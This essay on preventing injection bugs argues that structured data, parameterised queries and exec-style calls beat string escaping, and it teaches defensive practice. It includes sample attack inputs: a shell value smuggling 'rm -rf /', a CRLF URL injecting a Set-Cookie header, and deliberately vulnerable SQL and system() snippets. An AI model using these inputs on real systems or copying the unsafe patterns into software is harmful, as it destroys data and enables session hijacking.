The two biggest threats to the web are caused by the same underlying mistake. It is time this problem was fixed at its root. This article will attempt to provide the tools do so.

Input sanitation, input filtering or output escaping?

The Open Web Application Security Project (OWASP) does a great job at educating people and suggesting practical solutions to avoid common weaknesses. Unfortunately, most security bloggers focus on vulnerabilities rather than the prevention of attacks, and those that do often give bad advice. For example, common advice is to avoid XSS (cross-site scripting) and SQL injection bugs by "sanitizing" or "validating" input. Now, by itself this is good advice.

Unfortunately, the phrase "sanitize your inputs" is often misunderstood and the advice itself can be misguided. For example, Chris Shiflett says:

 If you reject [anything but alphanumerics], Berners-Lee and O'Reilly will be
 rejected, despite being valid last names.   However, this problem is easily
 resolved.  A quick change to also allow single quotes and hyphens is all you
 need to do.  Over time, your input filtering techniques will be perfected.

I think this advice is a little unhealthy. Those are valid names, and rejecting them will only scare away customers and reinforce the idea that the "security Nazis" are out to inconvenience people. I wish people would place less emphasis on filtering and sanitizing. Citing this XKCD comic has become a cliché, which (while funny) makes it worse:

Validating and sanitizing input is good when it refers to parsing input into meaningful values immediately when receiving it, so that you don't, say, get a URL when you are expecting an integer. The horror story of ROBCASHFLOW shows how important input restrictions can be (but see also this cautionary list. Tl;dr: you're doomed either way).

However, input sanitation will (in general) not prevent XSS or SQL injection. The OWASP XSS prevention "cheat-sheet" recognizes input validation and sanitation for what it is; a good secondary security measure in a broader "defense in depth" strategy.

Instead, there are only two correct ways to prevent "injection" bugs. The best is often even omitted from advice, which is to avoid the problem entirely (see below). The other is to escape output. Unfortunately, advice to escape often seems to imply that you should manually call escaping procedures; "just use mysql_real_escape_string()". This is a very bad idea; it's tedious, it's easy to forget, it makes code less readable and it requires everyone working on the code to be equally informed about security issues (a great idea, but not very realistic).

Let's investigate how we can prevent these vulnerabilities easily and automatically. This will help us secure applications in a structural rather than an ad-hoc way.

The trouble with strings

The underlying problem of all these vulnerabilities is that a tree structure (e.g., the SQL script's AST or the HTML DOM tree) is represented as a string, and user input which should be a node in the tree is inserted into this string. If this includes characters from the meta-language which describes the tree's structure, it can influence that structure. Here's an example:

<p>{username} said the following: {message}</p>

When message is "So you see, if a<b and c<a, then b>c.", you get output like this (depending on the browser, HTML version and phase of the moon):

Math teacher said the following: So you see, if ac.

This code is simply incorrect, and this bug will frustrate users like the math teacher. But this can turn into a security nightmare; any punk can make you look like a fool by making your images dance around, taking over your users' sessions by stealing cookies, or do much worse. The underlying reason this nonsense is possible at all is the fact that you are mixing user input strings with HTML.

In other words, you're performing string surgery on the serialized representation of a tree structure. Just stop and think how insane that really sounds! Why don't we use real data types? While researching this topic, I found an insightful article called "Safe String Theory for the Web". The author has a good grasp on the problem and comes close to the solution, but he never transcends the idea of representing everything as a string.

Many people don't, so despite the flawed concept, there are several solutions that take string splicing as a given. For instance, some frameworks have a sort of "safe HTML buffers", which automatically HTML-escape strings. These solutions don't deal with the context problem from "Safe String Theory for the Web". There's only one built-in string type, and making it context-aware is extremely hard, maybe even impossible. Strongly typed languages have an advantage here, though!

Representing HTML as a tree helps preventing injection bugs, and has other advantages over automatic escaping. For example, we need to worry less about generating invalid HTML; our output is always guaranteed to be well-formed. The essence of an XSS attack is that it breaks up your document structure and re-shapes it. These are just two sides to the same coin: By taking control of the HTML's shape, XSS is also avoided.

There's another, more insidious problem with splicing HTML strings, which I haven't seen discussed much either. It's another context problem; if your complex web application contains many "helper" functions, it becomes very hard to keep track of which helper functions accept HTML and which accept text. For example, is the following PHP function safe?

function render_latest_topicslist() {
  $out = '';
  foreach(Forum::latestPosts(10) as $topic) {
    $link = render_link('forum/show/'.(int)$topic['id'], $topic['title']);
    $out .= "<li>{$link}</li>";
  }
  return "<ul id=\"latest-topics\">{$out}</ul>";
}

This is (of course) a trick question. Consider:

$dest_url = ... some URL ...
$dest = htmlspecialchars($dest_url, ENT_QUOTES, 'UTF-8');
echo render_link($dest_url, "<span>Go to <em>{$dest}</em> directly.</span>");

Either this second example is wrong and the tags will come out literally (i.e., as &lt;span&gt;...&lt;/span&gt; in the HTML source), or the first example was wrong and you have an injection bug. You can't tell without consulting render_link's API documentation or implementation. With many helper procedures, how can you keep track of which accept fully formed HTML and which escape their input? What happens when a function which auto-encodes suddenly needs to be changed to accept HTML?

This style of programming results in ad-hoc security. You add escaping in just the right places, decided on a case-by-case basis. This is unsafe by default; you must remember to escape, which makes it error-prone. It's also hard to spot mistakes in this style. The alternative to ad-hoc security is structural security: a style which makes it virtually impossible to write insecure code by accident, thus eliminating entire classes of vulnerabilities.

For example, in PHP we could use the DOM library to represent an HTML tree:

function get_latest_topicslist($document) {
  $ul = $document->createElement('ul');
  $ul->setAttribute('id', 'latest-topics');

  foreach(Forum::latestPosts(10) as $topic) {
    $title = $document->createTextNode($topic['title']);
    $link = get_link($document, 'forum/show/'.(int)$topic['id'], $title);

    $li = $document->createElement('li');
    $li->appendChild($link);
    $ul->appendChild($li);
  }
  return $ul;
}

And the second example:

$contents = $document->createElement('span');
$contents->appendChild($document->createTextNode('Go to '));
$em = $document->createElement('em');
$em->appendChild($document->createTextNode($dest));
$contents->appendChild($em);
$contents->appendChild($document->createTextNode(' directly.'));
$link = get_link($document, $dest_url, $contents);

Unfortunately, this code is very verbose. The stuff that really matters gets lost in the noise of DOM manipulation. The advantage is that this is safe; text content cannot influence the tree structure, since the type of every function argument is enforced to be a DOM object and string contents are automatically XML-encoded on output.

Language design to the rescue!

Language design can help a great deal to improve security. For example, domain-specific languages like SXML and SSQL can save the programmer from having to remember to escape while writing most "normal", day-to-day code. This frees precious brain cycles to think about more essential things, like the program's purpose. Here's the example again, using SXML:

(define (latest-topics-list)
  `(ul (@ (id "latest-topics"))
       ,(map (lambda (topic)
               `(li ,(make-link `("forum" "show" (alist-ref 'id topic))
                                (alist-ref 'title topic)))))
             (forum-latest-posts 10)))

And the second example:

(make-link destination-url `(span "Go to " (em ,destination) " directly."))

This code is safe from XSS, like the PHP DOM example. However, this code is (to a Schemer) just as readable as the naive PHP version. And, most importantly, the safety is achieved without any effort from the programmer.

This shows the immense safety and security advantages that can be gained from language design. Of course, this isn't completely foolproof: We still need to ensure URIs used in href attributes have an allowed scheme like http: or ftp: and not, say, javascript:. Note that input filtering and sanitation can help in situations like these! Also, just like with automatic escaping, strings in sub-languages (like JS or CSS) aren't automatically escaped. However, there is less "magic" involved; this is a representation for HTML, so it's obvious that only HTML meta-characters will be encoded. If we're also using DSLs for sub-languages, this auto-escaping effect can be nested, solving the "context problem" in a way automatic escaping cannot.

SXML rewards programmers for writing safe code by making it look clean, concise, and easy to write. String splicing looks ugly and verbose in Scheme. In plain PHP this looks clean and simple, while DOM manipulation looks ugly. This subtly guides programmers into writing unsafe code. However, there are some PHP libraries that make safe code look clean. For example, Drupal has a "Forms API". It's a little ugly, but it's idiomatic in Drupal, which means code that uses it is considered cleaner than code that doesn't. Facebook is another attractive target for attackers, so they had to come up with a structural solution. Their solution is a language extension called XHP which adds native support for HTML literals.

These solutions are all specific to some codebase, not part of basic PHP. A framework or an existing codebase has "default" libraries, but when writing from scratch most programmers prefer to use what's available in the base language. This means a language should only include libraries that are safe by default. Otherwise, alternative safe libraries have to compete with the standard ones, which is an unfair disadvantage!

Sidestepping the SQL injection problem entirely

Even though it's possible to write safe code in almost any language if you try hard enough, the basic design of a language itself subtly influences how people will program in it by default. Consider the following example, using the Ruby PG gem:

# This code is vulnerable to SQL injection if the variables store user input
res = db.query("SELECT first, last FROM users "
               "WHERE login = '#{login}' "
               "AND customer = '#{customer}' "
               "AND department = '#{department}'")

Here we're using string interpolation, which is the expansion of variable names within a string. We saw this before, in PHP, but in Ruby you can drop back to the full language, which makes the safe solution a little easier to write:

# This code is safe
res = db.query("SELECT first, last FROM users "
               "WHERE login = '#{db.escape_string(login)}' "
               "AND customer = '#{db.escape_string(customer)}' "
               "AND department = '#{db.escape_string(department)}'")

Still, it looks uglier than the first example.

The documentation says the escape_string method is considered deprecated. That's because sidestepping the problem entirely is much smarter than escaping. This is done by passing the user-supplied values completely separate ("out of band") from the SQL command string. This way, the data can't possibly influence the structure of the command. They are kept separate even in the network protocol, so it is enforced all the way up into the server. As an added bonus, this is only slightly more verbose than the naive version:

# This code is even safer
res = db.query("SELECT first, last FROM users "
               "WHERE login = $1 AND customer = $2 AND department = $3",
	       [login, customer, department])

This scales only to about a dozen parameters. With more, it becomes hard to mentally map the correct parameter to the correct position. A DSL can do this automatically for you. For example, Microsoft's LinqToSQL language extension seems to do this. SSQL currently auto-escapes, but it could transparently be changed to use positional parameters.

Pervasive (in)security through (bad) design

I'm not a native English speaker, so I looked up the word "interpolation" on Merriam-Webster:

 interpolate, transitive verb:
 To alter or corrupt (as a text) by inserting new or foreign matter

To corrupt, indeed!

Interpolation of user-supplied strings is rarely correct, and it puts almost any conceivable safe API at a disadvantage by making the wrong thing easier and shorter to write than the right thing. Beginners, unaware of the security risks, will try to use this "neat feature". It's put in there for a reason, right? Some people are trying to fix string interpolation, which is a noble goal but I wouldn't expect this to be adopted as the "native" string interpolation mechanism in a language any time soon.

The Ruby examples show the importance of good documentation and library design. The docs pointed us in the right direction by marking the escape_string method as deprecated. Its good design is more apparent when contrasting it with the MySQL gem. This has no support for positional arguments in query, having only escape_string and prepare. The latter allows you to pass parameters separately, but it conflates value separation with statement caching and has an unwieldy API. Finally, the docs are quite sparse. Taken together, this all gently nudges developers into the direction of string interpolation by making that the easiest way to do it. Much of this is due to the design of MySQL's wire protocol, which dictates the API of the C library, which in turn guides the design of "high-level" libraries built on top of it.

I think high-level libraries should strive to abstract away unsafe or painful aspects of the lower levels. For example, the Chicken MySQL-client egg emulates value separation:

(conn (string-append "SELECT first, last FROM users "
                     "WHERE login = '?login' "
                     "AND customer = '?cust' "
                     "AND department = '?dept'")
      `((?login . ,login) (?cust . ,customer) (?dept . ,department)))

Ruby's MySQL gem could easily have done this, but they chose to restrict themselves to making a thin layer which maps closely to the C library.

Not all is lost with crappy libraries: Abstractions can solve such problems at an even higher level. Rails can safely pass query parameters via Arel, in a database-independent way, even though MySQL is one of the back-ends. This is true for SQLAlchemy, PDO and many others.

Other examples

This section will show more examples of the same bug. They can all be structurally solved in two simple ways: Automatic escaping (by using proper data structures) or passing data separately from the control language. But let's start with one where this won't work :)

Poisoned NUL bytes

As you may know, strings in the C language are pointers to a character array terminated by a NUL (ASCII 0) byte. Many other languages represent strings as a pointer plus a length, allowing NUL "characters" to simply occur in strings, with no special meaning.

This representational mismatch can be a problem when calling C functions from these languages. In many cases, a C character array of the length of the string plus 1 is allocated, the string contents are copied from the "native" string to the array and a NUL byte is inserted at the end. This causes a reinterpretation of the string's value if it contains a NUL byte, which opens up a potential vulnerability to a "poisoned" NUL byte attack.

Let's look at a toy example in Chicken Scheme:

(define greeting "hello\x00, world!")

(define calculate-length-in-c
  (foreign-lambda int "strlen" c-string))

(print "Scheme says: " (string-length greeting))
(print "C says: " (calculate-length-in-c greeting))

As far as Scheme is concerned, the NUL byte is perfectly legal and the string's length is 14, but for C, the string ends after hello, which makes for a length of 5. There is no way in C to "escape" NUL bytes, and we can't sidestep it here, either. Our only option is to raise an error:

 Scheme says: 14
 
 Error: (##sys#make-c-string) cannot represent string with
    NUL bytes as C string: "hello\x00, world!"

This is a good example of structural security; it doesn't matter whether the programmer is caffeine-deprived, on a tight deadline or simply unaware of this particular vulnerability. He or she is protected from accidentally making this mistake because it's handled at the boundary between C and Scheme, which is exactly where it should be handled.

HTTP response splitting/Header injection

HTTP response splitting and HTTP header injection are two closely related attacks, based on a single underlying weakness.

The idea is simple: HTTP (response) headers are separated by a CRLF combination. If user input ends up in a header (like in a Location header for a redirect), this can allow an attacker to split a header in two by putting a separator in it. Let's say that http://example.com/foo gets redirected to http://example.com/blabla?q=foo.

An attacker can trick someone (or their browser) into following this link (%0d%0a is an URI-encoded CRLF pair):

 http://www.example.com/abc%0d%0aSet-Cookie%3a%20SESSION%3dwhatever-i-want

This could cause the victim's session cookie for example.com to be overwritten:

 Location: http://www.example.com/blabla?q=abc
 Set-Cookie: SESSION=whatever-i-want

This is a session fixation attack. For this particular bug, the real solution is of course to properly percent-encode the destination URI, but the general solution can be as simple as disallowing newlines in the header-setting mechanism (e.g., PHP does this since 5.1.2). Doing it in the only procedure which is capable of emitting headers is a structurally secure approach, but it won't protect against all attacks.

For example, even if we disallow newlines it is still possible to set a parameter (attribute) or a second value for a header, splitting it with a semicolon or a comma, respectively:

 Accept: text/html;q=0.5, text/{user-type}

If this is done unsafely, extra content-types can be added. They can even be given preference:

 Accept: text/html;q=0.5, text/plain;q=0.1, application/octet-stream;q=1.0

Protecting against these sorts of attacks can only be done with libraries which know each header's syntax and use rich objects to represent them. This approach is taken by intarweb and Guile's HTTP library, and is similar to representing HTML as a (DOM) tree. I'm not aware of any other libraries which use fully parsed "objects" to represent HTTP header values.

Running subprocesses

For some reason, often people use a procedure like system() to invoke subprocesses. It's the most convenient way to quickly run a program just like you would from the command line. It will pass this string to the Unix shell, which expands globs ("wildcards") and runs the program:

(system (sprintf "echo \"~A\"" input))  ;; UNSAFE:   byebye files"; rm -rf / " 

Several languages have specialized syntax for invoking the shell and putting the output in a string using backticks, e.g., `echo hi`. The really bad part is that string interpolation is supported within the backtick operator, e.g., `echo Hi, "{$name}"`. This is dangerous because the shell is yet another interpreter with its own language, and we've learned by now that we shouldn't embed user input directly into a sublanguage. Here too, string interpolation makes the wrong thing very convenient, which increases the risk of abuse and bugs. After all, spaces and quotes are perfectly legal inside filenames, but when used with unsafely interpolated parameters, they will cause errors.

It is possible to escape shell arguments, but it's very tricky: no two shells provide exactly the same command language with the same meta-characters. Is your /bin/sh really bash, dash, ash, ksh or something else? It is even unspecified whether the sh used is /bin/sh.

However, a better approach is often available. Many programming languages offer an interface to one or more members of the POSIX exec() function family. These allow passing the arguments to the program in a separate array, and they don't go through the shell to invoke the program at all. This is faster and a lot more secure.

(use posix)
;; Accepts a list of arguments:
(process "echo" (list "Hello, " first-name " " last-name))

By sidestepping the problem we've made it simpler, shorter than the system call above and safer, which is our goal. In languages with string interpolation this will probably be slightly more verbose than the system() version.

There is one small problem: by eliminating a call to the shell, we've also lost the ability to easily construct pipelines. This can be done by calling several procedures, but this is way more complicated than it is in the shell language. The obvious solution to that is to design a safe DSL. This is what the Scheme Shell does with its notation for UNIX pipelines:

;; This will echo back the input, regardless of "special" characters
(define output (run/string (| (echo input) (caesar 5) (caesar 21))))
(display output)

Almost as convenient as the backtick operator, but without its dangers.

Summary

Language design can help us write applications which are structurally secure. We should strive to make writing the right thing easier than the wrong thing so that even naively written, quick and dirty code has some chance of being safe. To reach this goal, we can use the following approaches, in roughly decreasing order of safety:

  • "Sidestep" the issue by keeping data separated from commands.
  • Represent data in proper data structures, not strings. On output, escape where needed.
  • Use "safe buffers" which auto-escape concatenated strings.
  • If escaping or separation is impossible, raise an error on bad data.
  • If all else fails you can escape manually, but use coding conventions that make unsafe code stand out.

These approaches are your first line of defense. Besides using these, you should also filter and sanitize your input. Just don't mistake that as the fix for injection vulnerabilities!

This is the positive advice I can give you. The negative advice is simply to avoid building language or library features which make unsafe code easier to write than safe code. An example of such a feature is string interpolation, which causes more harm than good.